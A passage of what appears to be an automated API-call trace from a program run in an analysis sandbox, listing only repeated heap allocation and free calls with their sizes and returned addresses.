lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.497] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfd0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abe0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0a8 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e618 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3c0 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab98 [0075.497] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ada8 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df70 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4e0 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.498] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.498] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.499] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df70 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ada8 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76adc0 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab98 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3c0 [0075.499] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e618 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0a8 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfd0 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76afd0 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.500] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.500] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.501] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.501] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.502] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.503] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.503] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.504] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.504] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.505] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.505] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.506] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.506] 